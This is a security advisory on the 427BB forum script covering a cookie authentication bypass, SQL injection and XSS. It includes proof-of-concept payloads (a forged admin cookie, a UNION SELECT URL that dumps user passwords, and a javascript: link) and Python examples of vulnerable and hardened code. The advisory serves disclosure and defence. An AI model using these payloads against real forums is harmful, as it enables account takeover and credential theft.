Cookie Auth Bypass, SQL Injections, XSS in 427BB

Summary

Vulnerability
Cookie Auth Bypass, SQL Injections, XSS in 427BB
Discovered
2006.01.07
Last Update
n/a
ID
EV0018
CVE
CVE-2006-0153 CVE-2006-0154 CVE-2006-0155
Risk Level
high
Type
Multiple Vulnerabilities
Status
Unpatched
Vendor
n/a
Vulnerable Software
427BB (http://sourceforge.net/projects/fourtwosevenbb)
Version
checked: 2.2 and 2.2.1
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the 427BB (http://sourceforge.net/projects/fourtwosevenbb) forum script.

1. Authentication bypass using modified cookie values.

Vulnerable scripts: login.php, getvars.php

To authorize an already logged-in user, the forum scripts check only three cookie values:

  • username
  • authenticated
  • usertype

No password comparison is made. All three values are supplied by the client, so anyone can set them to impersonate any user, including the administrator.

2. 427BB has multiple SQL injection vulnerabilities.

For example:

Vulnerable script: showthread.php

The variable $ForumID is not sanitized before being used in a SQL query. An attacker can inject arbitrary SQL code into the query.

3. Arbitrary script code insertion is possible when posting a message containing a URL.

Vulnerable script: posts.php

Condition: a visitor has to click the link.

PoC/Exploit

1. Authentication bypass using modified cookie values.

No password is needed. Send the following cookies:
Cookie: username=admin; authenticated=1; usertype=admin
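The cookie check described in the Description section and exercised by the PoC above, modelled in Python (427BB itself is PHP; this is an added example, not the forum's code). The user records, password hashes, cookie names and the HMAC-signed session cookie are this example's own constructions. It shows why the forged cookie passes the original check and why a server-signed cookie, issued only after a password check, does not:

```python
"""Added example: model of the 427BB cookie check and a hardened replacement.
Not 427BB code (the forum is PHP); names, secret and user records are constructed."""
import hashlib
import hmac
import os


# Constructed user table: per-user salt plus a PBKDF2 hash of an illustrative password.
def _pw_record(password):
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


USERS = {
    "admin": {"usertype": "admin", "pw": _pw_record("correct horse")},
    "bob":   {"usertype": "user",  "pw": _pw_record("hunter2")},
}
SERVER_SECRET = os.urandom(32)  # assumption: per-deployment key kept out of the web root

# The forged cookies from the PoC above, as one Cookie header value.
FORGED_COOKIE = "username=admin; authenticated=1; usertype=admin"


def parse_cookies(header_value):
    """Split a Cookie header value into a name -> value dict."""
    cookies = {}
    for part in header_value.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def vulnerable_is_admin(cookie_header):
    """Mirrors the advisory: trusts username/authenticated/usertype exactly as the client sent them."""
    c = parse_cookies(cookie_header)
    return c.get("authenticated") == "1" and c.get("usertype") == "admin" and "username" in c


def login(username, password):
    """Hardened login: verify the password first, then hand out an HMAC-signed session cookie."""
    rec = USERS.get(username)
    if rec is None or "|" in username:          # '|' is the field separator below
        return None
    salt, stored = rec["pw"]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    if not hmac.compare_digest(candidate, stored):
        return None
    payload = f"{username}|{rec['usertype']}"
    tag = hmac.new(SERVER_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"session={payload}|{tag}"


def hardened_is_admin(cookie_header):
    """Accept the role only if the signature verifies and the server-side record still says admin."""
    token = parse_cookies(cookie_header).get("session", "")
    parts = token.split("|")
    if len(parts) != 3:
        return False
    username, usertype, tag = parts
    expected = hmac.new(SERVER_SECRET, f"{username}|{usertype}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):  # client cannot forge this without SERVER_SECRET
        return False
    return usertype == "admin" and USERS.get(username, {}).get("usertype") == "admin"


if __name__ == "__main__":
    print("vulnerable check, forged cookie:", vulnerable_is_admin(FORGED_COOKIE))  # True
    print("hardened check, forged cookie: ", hardened_is_admin(FORGED_COOKIE))     # False
    admin_cookie = login("admin", "correct horse")
    print("hardened check, real login:    ", hardened_is_admin(admin_cookie))      # True
```

The signed cookie is the minimal fix; a random session identifier looked up in server-side storage works equally well and additionally allows sessions to be revoked. Either way the role must come from the server, never from a client-editable cookie field.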

2. SQL Injection Example.

You need to be logged in as a registered user.
http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
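The showthread.php injection described above and exercised by the PoC URL, modelled on an in-memory SQLite database in Python (an added example, not 427BB code). The `threads` and `users` tables, their columns and rows are constructed for the demo, so the payload is the URL-decoded PoC adapted to those names. The vulnerable function pastes `$ForumID` into the query text and returns the credentials the UNION pulls in; the hardened one type-checks the value and binds it as a parameter:

```python
"""Added example: the showthread.php pattern modelled on SQLite, vulnerable and hardened.
Not 427BB code; the tables, columns and rows are constructed for the demo."""
import sqlite3

# URL-decoded form of the PoC payload, adapted to the constructed table/column names below.
PAYLOAD = "999 union select UserName,Password,null,null from users"


def make_db():
    """Constructed schema: the thread list has four columns, which the UNION must match."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE threads(ThreadID INTEGER, Subject TEXT, Author TEXT, ForumID INTEGER);
        INSERT INTO threads VALUES (1, 'Welcome', 'admin', 1), (2, 'Rules', 'admin', 1),
                                   (3, 'Off topic', 'bob', 2);
        CREATE TABLE users(UserName TEXT, Password TEXT);
        INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
    """)
    return conn


def vulnerable_showthread(conn, forum_id):
    """$ForumID pasted into the query text: anything after the number is executed as SQL."""
    sql = "SELECT ThreadID, Subject, Author, ForumID FROM threads WHERE ForumID=" + forum_id
    return conn.execute(sql).fetchall()


def hardened_showthread(conn, forum_id):
    """Type-check the input, then pass it as a bound parameter; it can never become SQL text."""
    try:
        fid = int(forum_id)
    except (TypeError, ValueError):
        raise ValueError("ForumID must be an integer") from None
    return conn.execute(
        "SELECT ThreadID, Subject, Author, ForumID FROM threads WHERE ForumID=?", (fid,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal request:", vulnerable_showthread(db, "1"))
    print("vulnerable, PoC payload:   ", vulnerable_showthread(db, PAYLOAD))  # user names and passwords
    print("hardened, normal request:  ", hardened_showthread(db, "1"))
    try:
        hardened_showthread(db, PAYLOAD)
    except ValueError as e:
        print("hardened, PoC payload:      rejected:", e)
```

Because `ForumID=999` matches no thread, the only rows the vulnerable query returns are those the injected `UNION SELECT` supplies, which is exactly how the PoC exposes the user table. The integer cast in the hardened version rejects the payload outright; for string parameters the bound placeholder alone is the fix.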

3. Arbitrary script code insertion.

Posting new message. Message text:
[url=javascript:alert(xss)]clickme[/url]
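The posts.php flaw described above, reproduced with a minimal `[url=...]` BBCode renderer in Python (an added example, not 427BB code; the tag regex and the http/https allowlist are this example's own choices). The vulnerable renderer copies the URL straight into `href`, so the PoC message becomes a `javascript:` link. The hardened renderer escapes everything the user wrote, accepts only URLs whose scheme parses as http or https, and rejects control characters, which also covers case and tab/newline variants of the scheme that browsers would still execute:

```python
"""Added example: a minimal [url=...] BBCode renderer showing the posts.php flaw and a fix.
Not 427BB code; the tag regex and the scheme allowlist are this example's own choices."""
import html
import re
from urllib.parse import urlsplit

URL_TAG = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)

# The PoC message text from the advisory.
POC_MESSAGE = "[url=javascript:alert(xss)]clickme[/url]"


def vulnerable_bbcode_to_html(text):
    """Copies the URL straight into href: any scheme, including javascript:, goes through."""
    return URL_TAG.sub(lambda m: f'<a href="{m.group(1)}">{m.group(2)}</a>', text)


def safe_href(raw):
    """Return an attribute-safe href, or None if the URL is not a plain http(s) link."""
    if any(ord(ch) < 0x20 for ch in raw):        # tab/newline tricks such as "java\tscript:"
        return None
    url = raw.strip()
    parts = urlsplit(url)                         # urlsplit lower-cases the scheme for us
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return html.escape(url, quote=True)           # neutralise " and ' inside the attribute


def hardened_bbcode_to_html(text):
    """Escape everything the user wrote; only allowlisted URLs become links, others stay as text."""
    out, pos = [], 0
    for m in URL_TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        href, label = safe_href(m.group(1)), html.escape(m.group(2))
        out.append(f'<a href="{href}" rel="noopener noreferrer">{label}</a>' if href else label)
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    print("vulnerable:", vulnerable_bbcode_to_html(POC_MESSAGE))  # javascript: link survives
    print("hardened:  ", hardened_bbcode_to_html(POC_MESSAGE))    # link dropped, label kept
    print("hardened:  ", hardened_bbcode_to_html("see [url=http://example.com/?a=1&b=2]site[/url]"))
```

Scheme-relative and bare URLs such as `example.com/x` are rejected by the `netloc`/scheme check as well; if the forum wants to accept them it should prepend `http://` itself rather than relax the allowlist, since a denylist of bad schemes is what this class of bug routinely slips past.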

Solution

No solution for "Cookie Auth Bypass, SQL Injections, XSS in 427BB" is available. Check the vendor's website for updates.